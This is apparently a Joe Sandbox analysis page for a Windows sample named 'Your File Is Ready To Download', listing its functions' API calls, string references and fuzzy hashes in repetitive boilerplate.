Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$CountForegroundTickVisible
String ID:
API String ID: 2170047217-0
Opcode ID: 5cd9171340ae0c08aec1ca75464200a119c6ec53059f12f3124edf70cf7caf42
Instruction ID: 068b12eddd83bd8cb1277996eee6420d313031d967d61542347af43004245da0
Opcode Fuzzy Hash: 5cd9171340ae0c08aec1ca75464200a119c6ec53059f12f3124edf70cf7caf42
Instruction Fuzzy Hash: 6841D172208B808AF716DB66A4503ED3BB5F74DBD8F01412AEF89477A9CB38C581C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140049118, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B12D0: GetForegroundWindow.USER32(?,000000014000C660), ref: 00000001400B1324
Part of subcall function 00000001400B12D0: IsWindowVisible.USER32 ref: 00000001400B133E

GetTickCount.KERNEL32 ref: 0000000140049353

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$CountForegroundTickVisible
String ID:
API String ID: 2170047217-0
Opcode ID: 1d6b311c9f80a44cfedcc9bdb9d1f91dd8dfb643dc88f4eb26196a1cad482069
Instruction ID: a1f2476f4a3559f2181d3fe8da5a844bc4c9bbed0d65fd141c8f4cf45f53748d
Opcode Fuzzy Hash: 1d6b311c9f80a44cfedcc9bdb9d1f91dd8dfb643dc88f4eb26196a1cad482069
Instruction Fuzzy Hash: 3841C172208B808AF756DB66A4503E93BB5F74DBD8F05412AEF89477A9CB38C582C744

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400491EB, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B10D0: GetForegroundWindow.USER32(?,?,?,000000014000C62A), ref: 00000001400B1131
Part of subcall function 00000001400B10D0: IsWindowVisible.USER32 ref: 00000001400B114B

GetTickCount.KERNEL32 ref: 0000000140049353

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$CountForegroundTickVisible
String ID:
API String ID: 2170047217-0
Opcode ID: 9cb04c8b8f2d02ab0fd6d3837d6dcf59477ee73fd281aa5dd4cac94b6522c635
Instruction ID: 3c17d3e8240aa01bf241aae5cae1974eca1c80cfcfac0340c160a6b7321e75a0
Opcode Fuzzy Hash: 9cb04c8b8f2d02ab0fd6d3837d6dcf59477ee73fd281aa5dd4cac94b6522c635
Instruction Fuzzy Hash: 7941C072308A808AFB16DB66A4543E92BB5B74DBD8F054126EF89477B9CB38C581C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140049231, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B10D0: GetForegroundWindow.USER32(?,?,?,000000014000C62A), ref: 00000001400B1131
Part of subcall function 00000001400B10D0: IsWindowVisible.USER32 ref: 00000001400B114B

GetTickCount.KERNEL32 ref: 0000000140049353

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$CountForegroundTickVisible
String ID:
API String ID: 2170047217-0
Opcode ID: 6aeddff5f436e37de097542667335769226eb220401ea4a0deb14b88d1fd5e46
Instruction ID: e4ece6c738b09478acb9bd3fb219e37964d4982bf4437f3a6231e7f6d44f034f
Opcode Fuzzy Hash: 6aeddff5f436e37de097542667335769226eb220401ea4a0deb14b88d1fd5e46
Instruction Fuzzy Hash: 4D41C072308A808AFB16DB66A4543E92BB5B74DBD8F054126EF89477B9CB38C581C344

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003B920, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140031F30: GlobalUnlock.KERNEL32 ref: 0000000140031FF1
Part of subcall function 0000000140031F30: CloseClipboard.USER32 ref: 0000000140031FFE
Part of subcall function 0000000140031F30: GetTickCount.KERNEL32 ref: 0000000140032011
Part of subcall function 0000000140031F30: PeekMessageW.USER32 ref: 0000000140032045
Part of subcall function 0000000140031F30: GetTickCount.KERNEL32 ref: 0000000140032059

GetTickCount.KERNEL32 ref: 000000014003BA0A

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 024f1d71609417e25df78ba3b5009664177e51f2c5a064d1d53dff50156d85c9
Instruction ID: 20668be9cd8b0780342f6297416fb442c9922363e868988257576e6dd2d57db1
Opcode Fuzzy Hash: 024f1d71609417e25df78ba3b5009664177e51f2c5a064d1d53dff50156d85c9
Instruction Fuzzy Hash: 89318F71604A8481FB27DB63A8407EA67A4F78DBE8F184223FF69476F5CB74C5818301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140068E00, Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32 ref: 0000000140068EDD

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 58e8b232d2d31f3f56c266144180499fb183fed714fc7e8b3ddca1a7014eaa2b
Instruction ID: 947bc37787eb2eb57091b942e04b10a2c2fb4835268c403760bad1cb48cb2716
Opcode Fuzzy Hash: 58e8b232d2d31f3f56c266144180499fb183fed714fc7e8b3ddca1a7014eaa2b
Instruction Fuzzy Hash: 2431F632A1454082EB759B26D8447EE72E2F748790F644B26FF5D87AE4EB39CD458340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140071BA0, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_ui64tow.LIBCMT ref: 0000000140071CAD

Part of subcall function 00000001400B10D0: GetForegroundWindow.USER32(?,?,?,000000014000C62A), ref: 00000001400B1131
Part of subcall function 00000001400B10D0: IsWindowVisible.USER32 ref: 00000001400B114B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ForegroundVisible_ui64tow
String ID:
API String ID: 1685772607-0
Opcode ID: 052ad26a427877cae9d8842cbfea6538e8fffc477bc1f08b2fd2bd17a146ba1c
Instruction ID: bbfc68ea4e07141d68df2153f1fa83c1cddebd5bfd1fb98bdaa7138fcbfecd34
Opcode Fuzzy Hash: 052ad26a427877cae9d8842cbfea6538e8fffc477bc1f08b2fd2bd17a146ba1c
Instruction Fuzzy Hash: 4B316932608B8481E711DF56E48478AB7A4F3887D8F548129EF8C477A9CB79C546CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140048380, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 0000000140048453

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 8c6c7109fd51ce16c6543a1a8f1abf49a824e6daab550956bf8085be357ef6e2
Instruction ID: 9a6caf129f52177e355402dbcec9f0ba6e217b23fe4cd1b6085e6d60462d6e31
Opcode Fuzzy Hash: 8c6c7109fd51ce16c6543a1a8f1abf49a824e6daab550956bf8085be357ef6e2
Instruction Fuzzy Hash: D921F73170564242FA769B17A4003EE2781ABCDBD4F564834FF450B7F6EB38C8418348

Uniqueness

Uniqueness Score: -1.00%

Function 000000014002053B, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000000140020542

Part of subcall function 00000001400203C0: FindResourceW.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 00000001400203FB
Part of subcall function 00000001400203C0: FindResourceW.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 0000000140020417
Part of subcall function 00000001400203C0: SizeofResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 000000014002042E
Part of subcall function 00000001400203C0: LoadResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 0000000140020441
Part of subcall function 00000001400203C0: LockResource.KERNEL32(?,?,?,?,00000000,?,00000000,000000014002057D), ref: 000000014002044F

Part of subcall function 00000001400C9A10: HeapFree.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A26
Part of subcall function 00000001400C9A10: _errno.LIBCMT ref: 00000001400C9A30
Part of subcall function 00000001400C9A10: GetLastError.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A38

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Resource$Find$ErrorFreeHeapInfoLastLoadLockSizeof_errno
String ID:
API String ID: 2021521633-0
Opcode ID: d6386fe12684b44ed7ccb635f6e22d2d443ddb5fa0eccfc47a88c4aa949c7a14
Instruction ID: d2581fc6965fcb9cd5414fcd9eaa73160b58b27b9df1bcac88176e33a72fac09
Opcode Fuzzy Hash: d6386fe12684b44ed7ccb635f6e22d2d443ddb5fa0eccfc47a88c4aa949c7a14
Instruction Fuzzy Hash: 4D111372304BA089E716CF72A4407EE36A9E70CBC8F04082AFF4A53A5ACA34C955C781

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B15B0, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00000001400B15CD

Part of subcall function 00000001400B29A0: LoadLibraryW.KERNEL32 ref: 00000001400B29C3
Part of subcall function 00000001400B29A0: GetProcAddress.KERNEL32 ref: 00000001400B29D3

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: AddressLibraryLoadProcVisibleWindow
String ID:
API String ID: 3687547122-0
Opcode ID: e0cfbfe6f62c831c6aa278d473c7f519c1c571767cc38b36f924a90972b37a1e
Instruction ID: f70707d4431d8fb35a4e9d8c6b71cb6c932db20b169d1b7ffca47ecce951dd75
Opcode Fuzzy Hash: e0cfbfe6f62c831c6aa278d473c7f519c1c571767cc38b36f924a90972b37a1e
Instruction Fuzzy Hash: E0F03171704E8051FB569FA7A2413FC63A4EB8DBC4F4C5030BF49476AAEE34C5918714

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140056318, Relevance: 1.5, APIs: 1, Instructions: 21windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004DB0: GetTickCount.KERNEL32 ref: 0000000140004DE8

PostMessageW.USER32 ref: 0000000140056331

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountMessagePostTick
String ID:
API String ID: 1233319983-0
Opcode ID: 2074976bd7cf999bdea5e5f536954da0db2ffd285c679d57a622711dffce0d94
Instruction ID: 06614c12ff779bd4e11d61368138d2119cf4132a9b800c3e540040bf45b9906b
Opcode Fuzzy Hash: 2074976bd7cf999bdea5e5f536954da0db2ffd285c679d57a622711dffce0d94
Instruction Fuzzy Hash: C5E04F36314AC1C4D7A2DA23A4043DB5325F74CBD0F584452EF8A537A6DE39D847C304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CF2B4, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400D3A4C: _errno.LIBCMT ref: 00000001400D3A6F

Sleep.KERNEL32(?,?,00000000,00000001400CD0F7,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CF2F9

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Sleep_errno
String ID:
API String ID: 1068366078-0
Opcode ID: 44ec7645bf7145562d6450075c1070846455dc622797d2b44ee487d68ac9cb2e
Instruction ID: c3102fcdc3094b84445531ce05af16c6a901c2b2566dea57e8f9b88cb556d0eb
Opcode Fuzzy Hash: 44ec7645bf7145562d6450075c1070846455dc622797d2b44ee487d68ac9cb2e
Instruction Fuzzy Hash: C401D132321B80C6EA4A9F27A84039DB6A1F78CFD0F094121FF5A07BA4CB38D952C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A92C0, Relevance: 1.3, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00000001400A92DB

Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno$AllocateHeap_callnewhmalloc
String ID:
API String ID: 2243056865-0
Opcode ID: 811574271ce87861843856c1ea9fe0638b73e87b6eecc9380bbad392b79faf63
Instruction ID: 7bcdff37ff2d040582ae3e44b8d647126fe18db178480df19ca52cd0e18e52d1
Opcode Fuzzy Hash: 811574271ce87861843856c1ea9fe0638b73e87b6eecc9380bbad392b79faf63
Instruction Fuzzy Hash: 2DF0313370464486EF95CF6AE0C436D23A1E798BD8F189125EB5947399DB34C9D1CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A8E90, Relevance: 1.3, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400CA630: malloc.LIBCMT ref: 00000001400CA64A

malloc.LIBCMT ref: 00000001400A8EB5

Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8

Part of subcall function 00000001400C9A08: HeapFree.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A26
Part of subcall function 00000001400C9A08: _errno.LIBCMT ref: 00000001400C9A30
Part of subcall function 00000001400C9A08: GetLastError.KERNEL32(?,?,00000000,00000001400CD130,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400C9A38

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno$Heapmalloc$AllocateErrorFreeLast_callnewh
String ID:
API String ID: 2348730211-0
Opcode ID: fa57afaffd1429faa55b1bbb3f397dc7c40f0d153aa32acfc045764e4026fdc9
Instruction ID: 5406d3715ada1e9d0876f599c61e5cc097bc4716b97439f30b038baf1b5791ad
Opcode Fuzzy Hash: fa57afaffd1429faa55b1bbb3f397dc7c40f0d153aa32acfc045764e4026fdc9
Instruction Fuzzy Hash: 69F01C31612B0085FB5F9B63A4553A521D0AB5CB84F080138EF890B3A2EF7C85E68750

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0000000140091108, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 241windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 0000000140091175
malloc.LIBCMT ref: 0000000140091194
DestroyWindow.USER32 ref: 00000001400911A5
SendMessageW.USER32 ref: 0000000140091210
SendMessageW.USER32 ref: 000000014009122B
SendMessageW.USER32 ref: 0000000140091273
GetDC.USER32 ref: 000000014009129D
SelectObject.GDI32 ref: 00000001400912C7
GetTextMetricsW.GDI32 ref: 00000001400912DF
SendMessageW.USER32 ref: 00000001400912FD
GetSystemMetrics.USER32 ref: 000000014009135B
GetSystemMetrics.USER32 ref: 0000000140091389
MoveWindow.USER32 ref: 0000000140091456

Strings

SysListView32, xrefs: 000000014009116A
Can't create control., xrefs: 0000000140092380

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessageSend$MetricsWindow$System$CreateDestroyMoveObjectSelectTextmalloc
String ID: Can't create control.$SysListView32
API String ID: 2128158200-2372549606
Opcode ID: 639b5495c808a4fce8a97204315c5b1709fca12f3f6e31ad2f8bfef02c9574ee
Instruction ID: 8b187370ce9964201b21f946e87f45e34f3a21767b8e4785c225070cbf744bff
Opcode Fuzzy Hash: 639b5495c808a4fce8a97204315c5b1709fca12f3f6e31ad2f8bfef02c9574ee
Instruction Fuzzy Hash: 90B16D32714B848AEB528B36D4507ED63A1FB8D7D4F148226EF4967BA5DF34D9828700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140070060, Relevance: 32.2, APIs: 12, Strings: 6, Instructions: 726COMMON

Download Yara Rule

Strings

eEfgGaA, xrefs: 0000000140070434
ULlTt, xrefs: 000000014007078C
-+0 #, xrefs: 00000001400702A5
diouxX, xrefs: 0000000140070337
cCp, xrefs: 00000001400705F3
s, xrefs: 00000001400707CE

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: -+0 #$ULlTt$cCp$diouxX$eEfgGaA$s
API String ID: 0-1162591181
Opcode ID: b6c5557f7229d2c7d4b74eb8ea20577c320a1c8a5f8f6ada087f0fed3d3ff38e
Instruction ID: 0cf9748cd74b6ec35057faa728611eb6d2a274f056a0b23b3f07d8b12a5df3cf
Opcode Fuzzy Hash: b6c5557f7229d2c7d4b74eb8ea20577c320a1c8a5f8f6ada087f0fed3d3ff38e
Instruction Fuzzy Hash: 0552B076615650C5EB7A9B9780543FA63A1FB8CBC4F848216FB8A476F5EB3CC891C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140028120, Relevance: 21.3, Strings: 16, Instructions: 1343COMMON

Download Yara Rule

Strings

_$#@, xrefs: 0000000140028F70
Not allowed as an output variable., xrefs: 00000001400291F1
Missing close-quote, xrefs: 0000000140029207
Parse, xrefs: 000000014002824D
